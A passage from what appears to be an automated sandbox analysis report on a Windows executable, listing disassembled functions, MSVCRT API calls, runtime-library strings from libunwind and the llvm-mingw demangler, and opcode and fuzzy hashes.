fflush.MSVCRT ref: 00007FF6099B3D4A
abort.MSVCRT ref: 00007FF6099B3D4F

Part of subcall function 00007FF6099B8A70: getenv.MSVCRT ref: 00007FF6099B8A93

Strings

libunwind: _GCC_specific_handler() personality returned %d, xrefs: 00007FF6099B3B40
_GCC_specific_handler, xrefs: 00007FF6099B3BA2, 00007FF6099B3C03, 00007FF6099B3D05, 00007FF6099B3D2A
Personality indicated exception handler in phase 2!, xrefs: 00007FF6099B3D31
Personality installed context during phase 1!, xrefs: 00007FF6099B3C0A
libunwind: %s - %s, xrefs: 00007FF6099B3B9B, 00007FF6099B3BFC, 00007FF6099B3CFE, 00007FF6099B3D23
CCG!, xrefs: 00007FF6099B3891
libunwind: _GCC_specific_handler(%#010lx(%lx), %p), xrefs: 00007FF6099B3863
Personality continued unwind at the target frame!, xrefs: 00007FF6099B3BA9
RtlUnwindEx() failed, xrefs: 00007FF6099B3D0C
CCG , xrefs: 00007FF6099B3884
libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p), xrefs: 00007FF6099B3AE5

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush$Unwindabortgetenvmemcpy
String ID: CCG $CCG!$Personality continued unwind at the target frame!$Personality indicated exception handler in phase 2!$Personality installed context during phase 1!$RtlUnwindEx() failed$_GCC_specific_handler$libunwind: %s - %s$libunwind: _GCC_specific_handler(%#010lx(%lx), %p)$libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p)$libunwind: _GCC_specific_handler() personality returned %d
API String ID: 4246679292-2140983942
Opcode ID: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
Instruction ID: 093795590626c5ed87a03dba3f7d642a0fce423414c8d9a87c1d8da893b2f2e7
Opcode Fuzzy Hash: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
Instruction Fuzzy Hash: 07D18D21A0AAC282E6349F55E5423F96376FF84784F284135DE8D43792EF3DE595C700

Function 00007FF6099C2BCA Relevance: 31.6, APIs: 21, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isxdigit.MSVCRT ref: 00007FF6099C2BE5
isxdigit.MSVCRT ref: 00007FF6099C2BF7
isxdigit.MSVCRT ref: 00007FF6099C2C09
isxdigit.MSVCRT ref: 00007FF6099C2C1B
isxdigit.MSVCRT ref: 00007FF6099C2C2D
isxdigit.MSVCRT ref: 00007FF6099C2C3F
isxdigit.MSVCRT ref: 00007FF6099C2C51
isxdigit.MSVCRT ref: 00007FF6099C2C63
isxdigit.MSVCRT ref: 00007FF6099C2C75
isxdigit.MSVCRT ref: 00007FF6099C2C87
isxdigit.MSVCRT ref: 00007FF6099C2C99
isxdigit.MSVCRT ref: 00007FF6099C2CAB
isxdigit.MSVCRT ref: 00007FF6099C2CBD
isxdigit.MSVCRT ref: 00007FF6099C2CCF
isxdigit.MSVCRT ref: 00007FF6099C2CE1
isxdigit.MSVCRT ref: 00007FF6099C2CF3
isxdigit.MSVCRT ref: 00007FF6099C2D05
isxdigit.MSVCRT ref: 00007FF6099C2D17
isxdigit.MSVCRT ref: 00007FF6099C2D29
isxdigit.MSVCRT ref: 00007FF6099C2D3B
malloc.MSVCRT ref: 00007FF6099C2D88

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
Instruction ID: 91afea40598ea35c257d4e236beb2f689fe84c0ea72736f9f2d801aa8f27e984
Opcode Fuzzy Hash: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
Instruction Fuzzy Hash: 5A51926160CB8642F7594F249D9063E27B2BF40F41F6C0435CA6DC6BA6EF6CE9A4D210

Function 00007FF6099C7B80 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF6099C7C1B
_assert.MSVCRT ref: 00007FF6099C80BC

Part of subcall function 00007FF6099B3F50: fflush.MSVCRT ref: 00007FF6099B3F8F
Part of subcall function 00007FF6099B3F50: RtlUnwindEx.KERNEL32 ref: 00007FF6099B40A6
Part of subcall function 00007FF6099B3F50: fflush.MSVCRT ref: 00007FF6099B4106
Part of subcall function 00007FF6099B3F50: abort.MSVCRT ref: 00007FF6099B410B

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C80AF
yptn, xrefs: 00007FF6099C7B80
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF6099C80A8

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush$Unwind_assertabortmalloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 2460331008-2552725819
Opcode ID: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
Instruction ID: 8ab4889d9299dd3c63653fad6a49c6478f95cd8e7f607faa89a9dccdda58b5ca
Opcode Fuzzy Hash: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
Instruction Fuzzy Hash: 88E1C47261AB8286EA64CF11E8443BA77A5FB44B80F694535DF8D87792EF3CE541C300

Function 00007FF6099C2DF3 Relevance: 25.6, APIs: 17, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isxdigit.MSVCRT ref: 00007FF6099C2E0E
isxdigit.MSVCRT ref: 00007FF6099C2E20
isxdigit.MSVCRT ref: 00007FF6099C2E32
isxdigit.MSVCRT ref: 00007FF6099C2E44
isxdigit.MSVCRT ref: 00007FF6099C2E56
isxdigit.MSVCRT ref: 00007FF6099C2E68
isxdigit.MSVCRT ref: 00007FF6099C2E7A
isxdigit.MSVCRT ref: 00007FF6099C2E8C
isxdigit.MSVCRT ref: 00007FF6099C2E9E
isxdigit.MSVCRT ref: 00007FF6099C2EB0
isxdigit.MSVCRT ref: 00007FF6099C2EC2
isxdigit.MSVCRT ref: 00007FF6099C2ED4
isxdigit.MSVCRT ref: 00007FF6099C2EE6
isxdigit.MSVCRT ref: 00007FF6099C2EF8
isxdigit.MSVCRT ref: 00007FF6099C2F0A
isxdigit.MSVCRT ref: 00007FF6099C2F1C
malloc.MSVCRT ref: 00007FF6099C2F69

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
Instruction ID: 18d52f64dd06d23c615566493d5940cfe83d6e5db3aace83436addab33cccdfb
Opcode Fuzzy Hash: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
Instruction Fuzzy Hash: DE51936160CB8642F7594F249D9033E67A1BF40F41F6C4435CA6DC6BA6EF6CE5A0D210

Function 00007FF6099C82A0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF6099C82E7
realloc.MSVCRT ref: 00007FF6099C8385
malloc.MSVCRT ref: 00007FF6099C839B
memcpy.MSVCRT ref: 00007FF6099C83B6
_assert.MSVCRT ref: 00007FF6099C8410
realloc.MSVCRT ref: 00007FF6099C8476
realloc.MSVCRT ref: 00007FF6099C84C5
realloc.MSVCRT ref: 00007FF6099C851B
realloc.MSVCRT ref: 00007FF6099C85BE
memcpy.MSVCRT ref: 00007FF6099C85E0

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C8403
yptn, xrefs: 00007FF6099C82A0
Last != First && "Calling back() on empty vector!", xrefs: 00007FF6099C83FC

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcpy$_assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$yptn
API String ID: 3355138791-4068048850
Opcode ID: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
Instruction ID: ff57d4e5732323a1cbe3f27bcb832a3e0dc9785809c356e97159834e062284c6
Opcode Fuzzy Hash: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
Instruction Fuzzy Hash: CF91E5B2A05B8682EA25CF16E99467D73A6EB587C0F588531DF8D87792EF3CE541C300

Function 00007FF6099CF790 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF6099CF849
realloc.MSVCRT ref: 00007FF6099CF8E7
realloc.MSVCRT ref: 00007FF6099CF934
realloc.MSVCRT ref: 00007FF6099CF989
realloc.MSVCRT ref: 00007FF6099CF9E7
memcpy.MSVCRT ref: 00007FF6099CFA00
realloc.MSVCRT ref: 00007FF6099CFA36
realloc.MSVCRT ref: 00007FF6099CFB2C

Strings

c_object, xrefs: 00007FF6099CF7CB
objc_obj, xrefs: 00007FF6099CFA8B
c_object, xrefs: 00007FF6099CFA98
objc_obj, xrefs: 00007FF6099CF7BE

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID: c_object$c_object$objc_obj$objc_obj
API String ID: 1833655766-1179801904
Opcode ID: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
Instruction ID: 5bc437fdef0ad834acf24b7aee68dc9f11196fca3cae1cef050b0b979b943688
Opcode Fuzzy Hash: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
Instruction Fuzzy Hash: 50C120E6A05B4582EF65CF16E99426967A3EB55FC0F688831CB8D87796DF3CD841C300

Function 00007FF6099D7F20 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6099D7F82
memset.MSVCRT ref: 00007FF6099D8015
wcscpy.MSVCRT ref: 00007FF6099D806D
wcscat.MSVCRT ref: 00007FF6099D8078
wcslen.MSVCRT ref: 00007FF6099D8089
memset.MSVCRT ref: 00007FF6099D81A4
wcscpy.MSVCRT ref: 00007FF6099D8203
wcscat.MSVCRT ref: 00007FF6099D820E
wcslen.MSVCRT ref: 00007FF6099D8222

Strings

0, xrefs: 00007FF6099D80B6
, xrefs: 00007FF6099D82AB
@, xrefs: 00007FF6099D8266
0, xrefs: 00007FF6099D825B
@, xrefs: 00007FF6099D80C1

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset$wcscatwcscpywcslen
String ID: $0$0$@$@
API String ID: 4263182637-1413854666
Opcode ID: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
Instruction ID: dfffeaaebf4036b48d9c5ba08adec42a1ae3d9641550e356bfdf256baa3a79ce
Opcode Fuzzy Hash: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
Instruction Fuzzy Hash: C2B1C16191E6C285F3208F25E8553BA77A1FF84344F681135EA8D92BA6DF7DE185CB00

Function 00007FF6099CCA90 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF6099CCC08
memcpy.MSVCRT ref: 00007FF6099CCC27
malloc.MSVCRT ref: 00007FF6099CCC5B
malloc.MSVCRT ref: 00007FF6099CCE46
memcpy.MSVCRT ref: 00007FF6099CCE65

Strings

noexcept, xrefs: 00007FF6099CCCB3

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpy
String ID: noexcept
API String ID: 3800483350-1409219070
Opcode ID: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
Instruction ID: 6549a62d7e2a40ec9f360e46b9284cd341bb2435d404df7743a0452c700e172a
Opcode Fuzzy Hash: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
Instruction Fuzzy Hash: B60294B260AB4586EB618F15E8442797BA6FB44B80F6C4935DBCE87792EF3CE551C300

Function 00007FF6099D7260 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 318COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00007FF6099D7365
memset.MSVCRT ref: 00007FF6099D742D
wcscpy.MSVCRT ref: 00007FF6099D7494
wcscat.MSVCRT ref: 00007FF6099D749F
wcslen.MSVCRT ref: 00007FF6099D74A7
wcslen.MSVCRT ref: 00007FF6099D74C2
wcslen.MSVCRT ref: 00007FF6099D7540
wcslen.MSVCRT ref: 00007FF6099D7592

Strings

0, xrefs: 00007FF6099D736A
X, xrefs: 00007FF6099D7711
`, xrefs: 00007FF6099D7729

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: wcslen$memsetwcscatwcscpywcsncmp
String ID: 0$X$`
API String ID: 329590056-2527496196
Opcode ID: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
Instruction ID: 44dc3ad06015b0fd83d2a6c445da76cd84efdaccdc011af108f0fbfa951412bf
Opcode Fuzzy Hash: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
Instruction Fuzzy Hash: 71029F3291EBC181E7208F19E8803AA77A2FB85754F684235DA9D87BE6DF7DE145C700

Function 00007FF6099CE230 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CE275
realloc.MSVCRT ref: 00007FF6099CE2DB
realloc.MSVCRT ref: 00007FF6099CE337
realloc.MSVCRT ref: 00007FF6099CE39F
realloc.MSVCRT ref: 00007FF6099CE3FA
realloc.MSVCRT ref: 00007FF6099CE45A
realloc.MSVCRT ref: 00007FF6099CE4C5
realloc.MSVCRT ref: 00007FF6099CE513
realloc.MSVCRT ref: 00007FF6099CE56F

Strings

volatil, xrefs: 00007FF6099CE40F
restric, xrefs: 00007FF6099CE46F

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
Instruction ID: 691c74187a17b51aecf37a27e0315ba26d756ee4e7ffe91341667c6506b6e6a4
Opcode Fuzzy Hash: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
Instruction Fuzzy Hash: 95B140B3A06B8683EE29CF56E55426DB362EB54BC4F548431CB9E477A1EF3CE5518300

Function 00007FF6099C9ED0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C9EFC
realloc.MSVCRT ref: 00007FF6099C9FEC
realloc.MSVCRT ref: 00007FF6099CA06C
realloc.MSVCRT ref: 00007FF6099CA0E6
realloc.MSVCRT ref: 00007FF6099CA146
realloc.MSVCRT ref: 00007FF6099CA191
realloc.MSVCRT ref: 00007FF6099CA1D2
memcpy.MSVCRT ref: 00007FF6099CA1EC
realloc.MSVCRT ref: 00007FF6099CA224

Strings

set , xrefs: 00007FF6099CA08F
at offs, xrefs: 00007FF6099CA081

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID: at offs$set
API String ID: 1059646398-2369781007
Opcode ID: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
Instruction ID: 333dd8302718aebcd5df4afcbbf7eff7d143707d926f5c4c775bda249ee4c724
Opcode Fuzzy Hash: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
Instruction Fuzzy Hash: 7DA1A6B2A06B8583DF298F56E85036D6362EB58BC4F188531DB9D477A6EF3CD591C300

Function 00007FF6099B6830 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6099B6952
memset.MSVCRT ref: 00007FF6099B69E3
fputwc.MSVCRT ref: 00007FF6099B6A5E
fputwc.MSVCRT ref: 00007FF6099B6ABE
fputwc.MSVCRT ref: 00007FF6099B6B1E

Strings

o, xrefs: 00007FF6099B6844
o, xrefs: 00007FF6099B69F5
o, xrefs: 00007FF6099B6B3D
o, xrefs: 00007FF6099B6963
o, xrefs: 00007FF6099B699E
o, xrefs: 00007FF6099B6892

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputwc$memset
String ID: o$o$o$o$o$o
API String ID: 822753988-2858737866
Opcode ID: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
Instruction ID: 68ff8f07e754ed0d45d1dcfff105ea0d38809914d7edd7030361de76d537b55c
Opcode Fuzzy Hash: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
Instruction Fuzzy Hash: AC91E622E1824286F7754E16E2857396AF3AF147A4F289134DB6ED67D3DE3CF8818700

Function 00007FF6099CC560 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CC5D6
realloc.MSVCRT ref: 00007FF6099CC67B
realloc.MSVCRT ref: 00007FF6099CC6D7
realloc.MSVCRT ref: 00007FF6099CC744
realloc.MSVCRT ref: 00007FF6099CC79F
realloc.MSVCRT ref: 00007FF6099CC7FF
realloc.MSVCRT ref: 00007FF6099CC86A
realloc.MSVCRT ref: 00007FF6099CC8B8

Strings

volatil, xrefs: 00007FF6099CC7B4
restric, xrefs: 00007FF6099CC814

Memory Dump Source

